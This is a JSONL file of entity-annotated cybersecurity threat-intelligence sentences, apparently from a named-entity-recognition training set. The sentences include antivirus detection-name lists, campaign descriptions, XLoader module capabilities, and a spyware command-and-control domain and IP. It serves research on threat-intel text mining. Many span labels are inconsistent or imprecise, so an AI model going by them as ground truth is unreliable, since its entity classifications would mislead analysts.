{"text": "A backdoor also known as: HW32.Packed.A13D Backdoor.Sinowal.BC Backdoor/W32.Sinowal.335872.B Backdoor.Sinowal.Win32.471 Backdoor.Sinowal.BC Win32.Trojan.WisdomEyes.16070401.9500.9996 Trojan.Mebroot Win.Trojan.Sinowal-1209 Backdoor.Sinowal.BC Backdoor.Win32.Sinowal.eee Backdoor.Sinowal.BC Trojan.Win32.Sinowal.bfkka Backdoor.Win32.Sinowal.335872 Backdoor.W32.Sinowal!c Backdoor.Sinowal.BC Backdoor.Win32.Sinowal.~CRSB Trojan.Packed.2355 BehavesLike.Win32.Sality.fc Backdoor.Win32.Sinowal W32/Backdoor2.EHUE Backdoor/Sinowal.gje RKIT/MBR.Sinowal.W Trojan[Backdoor]/Win32.Sinowal Win32.Hack.SinowalT.bg.339968 Backdoor.Win32.Sinowal.eee Backdoor.Sinowal.BC Backdoor.Sinowal Win32.Backdoor.Sinowal.Liqd W32/SINOWAL.A!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004688", "source": "cyner2_train"}}
{"text": "What makes this interesting is how the dated botnet and macro malware trick are used together.", "spans": {"MALWARE: botnet": [[45, 51]], "MALWARE: macro malware": [[56, 69]]}, "info": {"id": "cyner2_train_004690", "source": "cyner2_train"}}
{"text": "This weekend saw multiple reports a new zero-day vulnerability that affected all versions of Microsoft Word.", "spans": {"VULNERABILITY: zero-day vulnerability": [[40, 62]], "SYSTEM: Microsoft Word.": [[93, 108]]}, "info": {"id": "cyner2_train_004691", "source": "cyner2_train"}}
{"text": "A 17-year-old vulnerability in Microsoft Office Equation Editor is now confirmed to be exploited by the Cobalt Group.", "spans": {"VULNERABILITY: A 17-year-old vulnerability": [[0, 27]], "SYSTEM: Microsoft Office Equation Editor": [[31, 63]], "VULNERABILITY: exploited": [[87, 96]], "THREAT_ACTOR: the Cobalt Group.": [[100, 117]]}, "info": {"id": "cyner2_train_004692", "source": "cyner2_train"}}
{"text": "In recent months, Kaspersky observed an increase in the number of malicious campaigns that use Google Advertising as a means of distributing and delivering malware.", "spans": {"ORGANIZATION: Kaspersky": [[18, 27]], "THREAT_ACTOR: malicious campaigns": [[66, 85]], "ORGANIZATION: Google Advertising": [[95, 113]], "MALWARE: malware.": [[156, 164]]}, "info": {"id": "cyner2_train_004693", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TROJ_BHO.SMK Win32.Trojan.WisdomEyes.16070401.9500.9922 W32/MalwareS.AXKH TROJ_BHO.SMK Trojan.DownLoader7.50629 BehavesLike.Win32.PWSZbot.dm Backdoor.WinNT.PcClient W32/Risk.AWDS-7973", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004694", "source": "cyner2_train"}}
{"text": "Initially, only the Windows version of ROKRAT was used, but the Android version of the malware was later identified.", "spans": {"SYSTEM: the Windows version": [[16, 35]], "MALWARE: ROKRAT": [[39, 45]], "SYSTEM: Android version": [[64, 79]], "MALWARE: malware": [[87, 94]]}, "info": {"id": "cyner2_train_004695", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HW32.Packed.F73E Backdoor/W32.Xhaker.593920 Backdoor.Xhaker.b.n7 Backdoor.Xhaker.Win32.49 Backdoor/Xhaker.b Trojan.Win32.Xhaker.cbfde W32/BackdoorX.BNHA Backdoor.Trojan Smalldoor.BKPC Backdoor.Win32.Xhaker.b Backdoor.Xhaker!qYrnZt9Kncc PE:Backdoor.Win32.VB.bnx!1075029071 BackDoor.Caverns.79 BehavesLike.Win32.Ramnit.hc W32/Backdoor.IYKC-7331 Backdoor/Xhaker.l Win32.Hack.Xhaker.b.kcloud Win32.Backdoor.Xhaker.doln W32/Xhaker.B!tr.bdr Backdoor.Win32.Xhaker.b Win32/Backdoor.bee", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004696", "source": "cyner2_train"}}
{"text": "We recently uncovered a coordinated campaign targeting Internet infrastructure providers, a media organization, a financial services company, and an Asian government organization.", "spans": {"THREAT_ACTOR: campaign": [[36, 44]], "SYSTEM: Internet infrastructure": [[55, 78]], "ORGANIZATION: providers,": [[79, 89]], "ORGANIZATION: media organization, a financial services company,": [[92, 141]], "ORGANIZATION: Asian government organization.": [[149, 179]]}, "info": {"id": "cyner2_train_004697", "source": "cyner2_train"}}
{"text": "XLoader can also load multiple malicious modules to receive and execute commands from its remote command-and-control ( C & C ) server , as shown below : Here ’ s a list of the modules and their functions : sendSms — send SMS/MMS to a specified address setWifi — enable or disable Wi-Fi connection gcont — collect all the device ’ s contacts lock — currently just an input lock status in the settings ( pref ) file , but may be used as a screenlocking ransomware bc — collect all contacts from the Android device and SIM card setForward — currently not implemented , but can be used to hijack the infected device getForward — currently not implemented , but can be used to hijack the infected device hasPkg — check the device whether a specified app is installed or not setRingerMode — set the device ’ s ringer mode setRecEnable — set the device ’ s ringer mode as silent reqState — get a detailed phone connection status , which includes activated network and Wi-Fi ( with or without password ) showHome — force the device ’ s back to the home screen getnpki : get files/content from the folder named NPKI ( contains certificates related to financial transactions ) http — access a specified network using HttpURLConnection onRecordAction — simulate a number-dialed tone call — call a specified number get_apps — get all the apps installed on the device show_fs_float_window — show a full-screen window for phishing Of note is XLoader ’ s abuse of the WebSocket protocol ( supported in many browsers and web applications ) via ws ( WebSockets ) or wss ( WebSockets over SSL/TLS ) to communicate with its C & C servers .", "spans": {"MALWARE: XLoader": [[0, 7], [1428, 1435]], "SYSTEM: Android": [[497, 504]]}, "info": {"id": "cyner2_train_004698", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.AutorunMI.Worm Trojan-Downloader.Win32.Flux!O Worm.AutoRun Trojan/Dropper.aiv Win32.Trojan.WisdomEyes.16070401.9500.9998 Win.Trojan.Autorun-973 Worm.Win32.AutoRun.lt Trojan.Win32.AutoRun.18461 Constructor.W32.VB.lgxd Backdoor.Win32.Popwin.~IQ Trojan.Popwin Worm/Win32.AutoRun Worm.AutoRunsT.ot.18432 Worm.Win32.AutoRun.lt Worm.Winko", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004699", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FamVT.SmalBHQc.Trojan Trojan.Zenshirsh.SL7 PUP.AdLoad/Variant not-a-virus:Downloader.Win32.AdLoad.syjh Trojan.Win32.Kazy.dydcdw Trojan.Vittalia.800 BehavesLike.Win32.Downloader.lc Variant.Kazy.ds PUA/IStartSurf.chew GrayWare[Adware]/Win32.istartsurf.a Trojan.Application.Bundler.Outbrowse.16 not-a-virus:Downloader.Win32.AdLoad.syjh TrojanDownloader:Win32/Subroate.A!bit Downloader.AdLoad PUA.Downloader!", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004700", "source": "cyner2_train"}}
{"text": "In this report, we'll review how the actors attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan.", "spans": {"THREAT_ACTOR: actors": [[37, 43]], "MALWARE: exploit": [[57, 64]], "MALWARE: NetTraveler Trojan.": [[94, 113]]}, "info": {"id": "cyner2_train_004701", "source": "cyner2_train"}}
{"text": "Interestingly, it utilizes a pseudorandom number generator PRNG used in Vawtrak s loader.", "spans": {"MALWARE: Vawtrak s loader.": [[72, 89]]}, "info": {"id": "cyner2_train_004702", "source": "cyner2_train"}}
{"text": "The iframe leads to Angler EK which downloads Bedep ad-fraud which then downloads a Gootkit loader.", "spans": {"MALWARE: Angler EK": [[20, 29]], "MALWARE: Bedep ad-fraud": [[46, 60]], "MALWARE: Gootkit loader.": [[84, 99]]}, "info": {"id": "cyner2_train_004704", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Razy.D3D173 Win32.Trojan.WisdomEyes.16070401.9500.9961 Ransom_Nymaim.R002C0DAT18 Ransom_Nymaim.R002C0DAT18 Ransom:Win32/Nymaim.F Win32/Trojan.160", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004706", "source": "cyner2_train"}}
{"text": "Based on our investigation, the actors behind Operation C-Major were able to keep their Android malware on Google Play for months and they advertised their apps on Facebook pages which have thousands of likes from high profile targets.", "spans": {"THREAT_ACTOR: Operation C-Major": [[46, 63]], "MALWARE: Android malware": [[88, 103]], "SYSTEM: Google Play": [[107, 118]], "SYSTEM: apps": [[156, 160]], "ORGANIZATION: Facebook": [[164, 172]], "ORGANIZATION: high profile targets.": [[214, 235]]}, "info": {"id": "cyner2_train_004708", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.MMTask.59905 Trojan/PSW.Mmtask.a Trojan.Heur.GM.040605A000 Win32.Trojan.WisdomEyes.16070401.9500.9759 W32/Trojan.ALHG-3475 Win.Trojan.Mmtask-1 Trojan-PSW.Win32.Mmtask.a Trojan.Win32.Mmtask.glty Trojan.Win32.MMTask.59905 Troj.PSW32.W.Mmtask.a!c TrojWare.Win32.PSW.MMTask.A Trojan.MMTask.1 BehavesLike.Win32.PWSZbot.qc Trojan/PSW.MMTask.a TR/PSW.MMTask.A1 Trojan[PSW]/Win32.Mmtask PWS:Win32/MMTask.A Trojan-PSW.Win32.Mmtask.a TrojanPSW.Mmtask Win32/PSW.MMTask.A Win32.Trojan-qqpass.Qqrob.Wuhe Trojan.PWS.Mmtask!shxUVb0b7bE Trojan-PWS.Win32.Mmtask W32/Bdoor.BG!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004710", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Heur.Corrupt.PE W32.Backdoor.Rbot Trojan:Win32/Damingvat.A.dam#2 Backdoor/Win32.Graybird.C918907", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004714", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Spy/W32.Banker.113430.B Heur.Win32.VBKrypt.3!O Trojan.Tinba.F3 Trojan.Tinba.Win32.1756 Trojan/Injector.bzpp Win32.Trojan.WisdomEyes.16070401.9500.9974 W32.Cridex.B TROJ_TINBA.SMH Win32.Trojan.Emotet.U Trojan.Win32.VB.dmqp Trojan.Win32.Tinba.euqtlz Troj.W32.VBKrypt.tpek Trojan.PWS.Tinba.161 TROJ_TINBA.SMH BehavesLike.Win32.Emotet.cm Trojan/Banker.Tinba.amp TR/Tinba.A.843 Trojan[Banker]/Win32.Tinba Trojan.Win32.VB.dmqp Trojan/Win32.Cridex.R197444 TrojanBanker.Tinba Trojan.PWS.Tinba! Trojan-Banker.Emotet W32/Injector.BZJE!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004717", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.HfsAutoB.CD60 Downloader.Bagle.Win32.491 Trojan/Downloader.Bagle.atn Trojan.Win32.Bagle.dswqdy Troj.Downloader.W32.Bagle.atn!c Trojan.Packed.650 Trojan-Downloader.Win32.Bagle TrojanDownloader.Bagle.bfu Worm/Win32.Bagle.R767 Trojan.DL.Bagle!+mahMemQ9a4 W32/Bagle.ATN!tr.dldr Trj/CI.A Win32/Trojan.2ff", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004719", "source": "cyner2_train"}}
{"text": "Although this injector is new, there are some connections to its older version sharing some similarities.", "spans": {"MALWARE: injector": [[14, 22]]}, "info": {"id": "cyner2_train_004721", "source": "cyner2_train"}}
{"text": "Proofpoint calls the two new variants recently identified Forked and Lite IcedID.", "spans": {"ORGANIZATION: Proofpoint": [[0, 10]], "MALWARE: Lite IcedID.": [[69, 81]]}, "info": {"id": "cyner2_train_004722", "source": "cyner2_train"}}
{"text": "Blackhole's author, Paunch, was arrested in October 2013 and while criminals kept using the kit for the next few months, the exploits slowly deprecated and lost value because of lack of development.", "spans": {"THREAT_ACTOR: Blackhole's author, Paunch,": [[0, 27]], "THREAT_ACTOR: criminals": [[67, 76]], "MALWARE: kit for": [[92, 99]], "MALWARE: exploits": [[125, 133]]}, "info": {"id": "cyner2_train_004723", "source": "cyner2_train"}}
{"text": "We named this family Kemoge due to its command and control CnC domain", "spans": {"MALWARE: Kemoge": [[21, 27]]}, "info": {"id": "cyner2_train_004724", "source": "cyner2_train"}}
{"text": "There has been significant media attention around a campaign likely by a nation-state actor targeting energy organizations in the U.S. including entities operating nuclear facilities.", "spans": {"ORGANIZATION: media": [[27, 32]], "THREAT_ACTOR: campaign": [[52, 60]], "THREAT_ACTOR: nation-state actor": [[73, 91]], "ORGANIZATION: energy organizations": [[102, 122]], "ORGANIZATION: entities operating nuclear facilities.": [[145, 183]]}, "info": {"id": "cyner2_train_004728", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W97M.Downloader.XL W97M/Downloader.buv W97M.Downloader W2KM_DLOADER.AUSUAY Trojan.Ole2.Vbs-heuristic.druvzi W97M.S.Downloader.217088 W97M.MulDrop.158 W2KM_DLOADER.AUSUAY W97M/Downloader.buv TrojanDropper:O97M/Turla.A!dha virus.office.qexvmc.1080", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004730", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Delfinject.18174 Win32.Trojan.WisdomEyes.16070401.9500.9930 Trojan.Win32.Banker.dnoogt Trojan.DownLoader12.55999 BehavesLike.Win32.Dropper.dm W32/Trojan.XESH-6077 TrojanDownloader.Banload.bimh TR/Dldr.Banload.ybjwz TrojanDownloader:Win32/BrobanKew.A TrojanBanker.Banker Trj/CI.A Win32/TrojanDownloader.Banload.VDB Trojan-Downloader.Win32.Banload W32/Banload.VGG!tr.dldr Win32/Trojan.994", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004731", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9840 Trojan:Win32/ShadowPad.E!dha", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004733", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.FakeAv.exgvmw Virus.W32.Virus!c TROJ_KRYPTIK_HA230029.UVPM Trojan.Win32.Crypt Trojan.Banker.GozNym.ey Trojan[Banker]/Win32.GozNym TrojanDownloader:Win32/Nymaim.K Trj/GdSda.A W32/Kryptik.GCCW!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004735", "source": "cyner2_train"}}
{"text": "The current phase of the Pawn Storm attack campaign started a little over a month ago, and the overall campaign was first identified in an October 2014 report from Trend Micro PDF.", "spans": {"THREAT_ACTOR: Pawn Storm": [[25, 35]], "THREAT_ACTOR: campaign": [[43, 51], [103, 111]], "ORGANIZATION: Trend Micro": [[164, 175]]}, "info": {"id": "cyner2_train_004737", "source": "cyner2_train"}}
{"text": "The Security Service of Ukraine SBU is continuously investigating this active threat, and has issued statements attributing the attacks to specific branches of the Russian Federal Security Service FSB.", "spans": {"ORGANIZATION: The Security Service of Ukraine SBU": [[0, 35]], "ORGANIZATION: Russian Federal Security Service": [[164, 196]]}, "info": {"id": "cyner2_train_004739", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Adware.Msidebar TSPY_STARTPAGE_CD100271.RDXN Win32.Trojan.WisdomEyes.16070401.9500.9721 Trojan.ADH.2 TSPY_STARTPAGE_CD100271.RDXN not-a-virus:AdWare.Win32.Loadwar.wmx Riskware.Win32.Loadwar.epwdej Win32.Trojan.Multiple.drwj Trojan.DownLoader7.8701 BehavesLike.Win32.Dropper.cc TR/Msidebar.C.39 GrayWare[AdWare]/Win32.Loadwar not-a-virus:AdWare.Win32.Loadwar.wmx Trojan:Win32/Msidebar.C Trj/CI.A Trojan.Win32.Msidebar Win32/Trojan.1a4", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004740", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Ehdoor Trojan/Win32.Sharik.R208903 Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004741", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Hoax.Win32.ArchSMS!O Tool.ArchSMS.Win32.7363 Trojan/ArchSMS.otfk Trojan.Zusy.D4232C Win32.Trojan.SMSSend.a PUA.PremiumSMSScam!g14 Hoax.Win32.ArchSMS.cpmhw Riskware.Win32.galh.eaqeda Hoax.W32.Archsms!c ApplicUnwnt.Win32.Hoax.ArchSMS.TP Trojan.SMSSend.7500 BehavesLike.Win32.Dropper.vc Hoax.Win32.ArchSMS W32.Trojan.Archsms HackTool[Hoax]/Win32.ArchSMS Trojan:Win32/Tarifarch.AO Hoax.Win32.ArchSMS.cpmhw Unwanted/Win32.ArchSMS.R216870 Win32.Trojan-psw.Archsms.Htcd Trojan.ArchSMS!vRB02EvsodQ Win32/Trojan.SMS.604", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004742", "source": "cyner2_train"}}
{"text": "From the beginning of 2015, a malicious spear-phishing campaign dubbed Pony, has been actively luring victims.", "spans": {"THREAT_ACTOR: malicious spear-phishing campaign": [[30, 63]], "MALWARE: Pony,": [[71, 76]]}, "info": {"id": "cyner2_train_004747", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojandownloader.Script W32/Trojan.EMGI-1028 Trojan.Win32.Banload.evocsm Troj.Downloader.Script!c TR/AD.Banload.jxcsg Trj/GdSda.A Win32/Trojan.Downloader.251", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004749", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9866 Ransom.BTCware Win.Ransomware.BTCWare-6329927-0 Win32.Trojan-Ransom.BTCWare.E Trojan.Win32.Filecoder.eplmfi Trojan.Encoder.11958 BehavesLike.Win32.FDoSBEnergy.dh AdWare.ConvertAd.qjt Ransom.Filecoder/Variant Trojan/Win32.Ransom.R208332 Ransom.BTCWare Trj/GdSda.A Trojan.Win32.BTCWare.a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004752", "source": "cyner2_train"}}
{"text": "File encryption utilized asymmetric Elliptic Curve Cryptography ECC with Curve SECT233R1 a.k.a. NIST B-233 using the Tiny-ECDH open source library combined with a per file Salsa20 symmetric key.", "spans": {"MALWARE: File encryption": [[0, 15]], "SYSTEM: Elliptic Curve Cryptography ECC": [[36, 67]], "SYSTEM: Curve SECT233R1": [[73, 88]], "SYSTEM: NIST B-233": [[96, 106]], "SYSTEM: Tiny-ECDH open source": [[117, 138]], "SYSTEM: Salsa20 symmetric key.": [[172, 194]]}, "info": {"id": "cyner2_train_004755", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Heur.kmGfrjraeapm2 W32/Trojan-Gypikon-based.DM2!Ma BehavesLike.Win32.Downloader.cc W32/Trojan-Gypikon-based.DM2!Ma Trojan/Banker.Banker.zmm Worm:Win32/Xtrat.B!A BScope.Trojan-Spy.Zbot Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004756", "source": "cyner2_train"}}
{"text": "An unknown threat actor is leveraging an evasive threat campaign distributed via Discord that features the PureCrypter downloader and targets government entities.", "spans": {"THREAT_ACTOR: An unknown threat actor": [[0, 23]], "THREAT_ACTOR: threat campaign distributed": [[49, 76]], "SYSTEM: Discord": [[81, 88]], "MALWARE: the PureCrypter downloader": [[103, 129]], "ORGANIZATION: government entities.": [[142, 162]]}, "info": {"id": "cyner2_train_004758", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.DroxpesLTAN.Trojan Trojan.Qhost Trojan/Qhost.niv TROJ_SPNR.0BFE11 Win32.Trojan.Qhost.d W32/Trojan2.LITU Win32/Tnega.ATUN TROJ_SPNR.0BFE11 Win.Trojan.6761663-1 Trojan.BAT.Qhost.abp Trojan.Win32.KKQP3298.dkyjvz Trojan.Win32.Z.Qhost.33750 Troj.Bat.Qhost!c Trojan.Hosts.43761 BehavesLike.Win32.BadFile.nh Trojan-Dropper.Win32.StartPage W32/Trojan.KKQP-3298 TR/Qhost.mju.53 Trojan.BAT.Qhost.abp Trojan/Win32.Qhost.R77387 Trojan.BAT.Qhost Trj/CI.A BAT/Qhost.NTH Bat.Trojan.Qhost.Lnya Trojan.Comisproc!uAYBYZyFk6g Win32/Trojan.34d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004759", "source": "cyner2_train"}}
{"text": "What Does SimBad Do ? ‘ SimBad ’ has capabilities that can be divided into three groups – Show Ads , Phishing , and Exposure to other applications .", "spans": {"MALWARE: SimBad": [[10, 16], [24, 30]]}, "info": {"id": "cyner2_train_004760", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.VidemoY.Trojan Win32.Trojan.WisdomEyes.16070401.9500.9988 Backdoor.Trojan Win.Trojan.Bifrose-17928 Trojan.Win32.Bifrost.csybxh Troj.W32.Jorik.Arcdoor.bjr!c BackDoor.Bifrost.15005 Trojan.Inject.Win32.22484 Worm.Win32.Msil Trojan:MSIL/Harvbot.B TrojanDropper.Injector Trj/CI.A W32/Jorik_Arcdoor.BJR!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004763", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Ransom.FireCrypt.A3 Ransom.BleedGreen Ransom_BleedGreen.A Win32.Trojan.WisdomEyes.16070401.9500.9560 Ransom.FireCrypt Ransom_BleedGreen.A Trojan-Ransom.Win32.Crypmodadv.xee Trojan.Win32.Z.Ransom.18432.C[h] Trojan.Encoder.10088 Trojan.Crypmodadv.Win32.90 trojanspy.msil.neos.a W32/Trojan.RPJE-7166 Trojan.Crypmodadv.en TR/Dropper.MSIL.owdes MSIL/Filecoder.DZ!tr Trojan.Ransom.HiddenTears.1 Ransom:Win32/Firecrypt.A Trojan.Ransom.FireCrypt Win32.Trojan.Crypmodadv.Pbpb Trojan.Crypmodadv! Trojan.VB.Inject Atros4.BUNV Trj/GdSda.A Win32/Trojan.Ransom.786", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004764", "source": "cyner2_train"}}
{"text": "We dubbed this campaign Operation Electric Powder", "spans": {"THREAT_ACTOR: campaign Operation Electric Powder": [[15, 49]]}, "info": {"id": "cyner2_train_004766", "source": "cyner2_train"}}
{"text": ") Following is the snippet of code in these older Exodus One samples showing the connection to the Command & Control : Below is the almost identical composition of the request to the Command & Control server in mike.jar ( also containing the path 7e661733-e332-429a-a7e2-23649f27690f ) : To further corroborate the connection of the Exodus spyware with eSurv , the domain attiva.exodus.esurv.it resolves to the IP 212.47.242.236 which , according to public passive DNS data , in 2017 was used to host the domain server1cs.exodus.connexxa.it .", "spans": {"MALWARE: Exodus One": [[50, 60]], "MALWARE: Exodus spyware": [[333, 347]]}, "info": {"id": "cyner2_train_004767", "source": "cyner2_train"}}
{"text": "The attack comes as an email containing a malicious Google Docs link.", "spans": {}, "info": {"id": "cyner2_train_004770", "source": "cyner2_train"}}
{"text": "Beginning in early 2008, Iranian security entities have engaged in operations to identify and arrest administrators of illicit websites and social media groups.", "spans": {"ORGANIZATION: Iranian security entities": [[25, 50]], "THREAT_ACTOR: administrators": [[101, 115]], "THREAT_ACTOR: social media groups.": [[140, 160]]}, "info": {"id": "cyner2_train_004772", "source": "cyner2_train"}}
{"text": "Musical Chairs is a multi-year campaign which recently deployed of new variant Gh0st we've named Piano Gh0st.", "spans": {"THREAT_ACTOR: Musical Chairs": [[0, 14]], "MALWARE: variant Gh0st": [[71, 84]], "MALWARE: Piano Gh0st.": [[97, 109]]}, "info": {"id": "cyner2_train_004776", "source": "cyner2_train"}}
{"text": "Odinaff is typically deployed in the first stage of an attack, to gain a foothold onto the network, providing a persistent presence and the ability to install additional tools onto the target network.", "spans": {"MALWARE: Odinaff": [[0, 7]], "SYSTEM: network,": [[91, 99]], "MALWARE: tools": [[170, 175]], "SYSTEM: network.": [[192, 200]]}, "info": {"id": "cyner2_train_004777", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9993 W32/Trojan.VVLV-9156 MSIL.Packed.Kryptik.JH Trojan.Win32.Razy.exgpmg BehavesLike.Win32.Trojan.gc Trojan.Razy.D2685F Trojan/Win32.Randrew.C2365157 Trojan-Dropper.MSIL.Small Trj/CI.A Win32/Trojan.24d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004778", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W97M_DLOADR.XTRQ W97M_DLOADR.XTRQ", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004784", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Kazy.DC9EF Win32.Trojan.WisdomEyes.16070401.9500.9996 W32/Trojan.QFDJ-7788 Backdoor.Trojan Trojan.DownLoader5.32593 Trojan.Small Win32.Troj.Disfa.cv.kcloud Backdoor:MSIL/Sootbot.B Trj/CI.A Win32.Trojan.Downloader.Dyzw BackDoor.WE!tr Win32/Trojan.018", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004785", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Packer.FSG.A Packer.FSG.A Downloader.WebDown.Win32.23 Troj.Downloader.W32.WebDown.10!c Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Downloader.BFIA TROJ_APHER.A Win.Trojan.Small-10534 Trojan-Downloader.Win32.WebDown.10 Packer.FSG.A Trojan.Win32.WebDown.buycqa Win32.Trojan-Downloader.Webdown.bfes Packer.FSG.A Trojan.DownLoader.2103 TROJ_APHER.A W32/Downloader.MUZI-7025 Trojan/Downloader.WebDown.10 Trojan/Win32.Unknown TrojanDownloader:Win32/Aphex.2_4 Packer.FSG.A Trojan-Downloader.Win32.WebDown.10 Packer.FSG.A Win-Trojan/Apher.1312 Win32/TrojanDownloader.Apher.070 Trojan.DL.WebDown!Zgs3lnw1FbY Trojan-Downloader.Win32.WebDown Trj/Downloader.GE", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004787", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Multi Trojan.MalPack.VB Uds.Dangerousobject.Multi!c Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan-Spy.Win32.SpyEyes.bdxs Trojan.Win32.Z.Fareitvb.933888 BehavesLike.Win32.BadFile.dh Trojan.VB.Crypt TR/Dropper.VB.dtffd Trojan[Spy]/Win32.SpyEyes Trojan-Spy.Win32.SpyEyes.bdxs Trojan/Win32.VBKrypt.R218990 Trj/GdSda.A Win32.Trojan.Inject.Auto Win32/Trojan.Spy.8cb", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004788", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.StrictorCS.S483160 Trojan.Graftor.D21F45 Win32.Application.PUPStudio.A HEUR:Trojan.Win32.KillFiles Trojan.Win32.Drop.eaoavd Trojan.Win32.Z.Graftor.614400.AJ Trojan.MulDrop5.12779 Trojan.KillFiles.Win32.6511 W32/Trojan.XBKC-8948 TR/Graftor.905216.18 TrojanDownloader:Win32/WebToos.A HEUR:Trojan.Win32.KillFiles Trojan/Win32.Krap.R106509 TrojanDropper.Sysn Trj/CI.A Trojan.DownLoader! Win32/Trojan.0cb", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004790", "source": "cyner2_train"}}
{"text": "A backdoor also known as: BackDoor.Dande.52 Trojan.Dande.Win32.1 Trojan.Win32.Dande BDS/Dande.xihzl Trojan.Zusy.D3503B Win32/Dande.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004791", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojandropper.Scrop TROJ_DROPPR.YYYJ Trojan-Dropper.Win32.Scrop.cxq Trojan.Win32.Autoit.euuwjs Troj.Dropper.W32.Scrop!c Trojan.DownLoader25.53180 TROJ_DROPPR.YYYJ Trojan.ECCW-6 TR/Autoit.wkswc Trojan[Exploit]/OLE.CVE-2014-6532 Trojan:O97M/Tanequalyn.A Trojan/Win32.AutoIt.C2019675 Win32.Trojan-dropper.Scrop.Pavt W32/Scrop.CO!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004792", "source": "cyner2_train"}}
{"text": "Interestingly enough, Sourcefire was the only security vendor directly referenced in the Powershell script.", "spans": {"ORGANIZATION: Sourcefire": [[22, 32]], "ORGANIZATION: only security vendor": [[41, 61]]}, "info": {"id": "cyner2_train_004793", "source": "cyner2_train"}}
{"text": "This malware attempts to collect a user's online banking data and sends out information to a control server.", "spans": {"MALWARE: malware": [[5, 12]], "SYSTEM: control server.": [[93, 108]]}, "info": {"id": "cyner2_train_004794", "source": "cyner2_train"}}
{"text": "Since the beginning of 2017, ESET researchers have been conducting an investigation into a complex threat mainly targeting Russia and Ukraine.", "spans": {"ORGANIZATION: ESET researchers": [[29, 45]], "MALWARE: complex threat": [[91, 105]]}, "info": {"id": "cyner2_train_004796", "source": "cyner2_train"}}
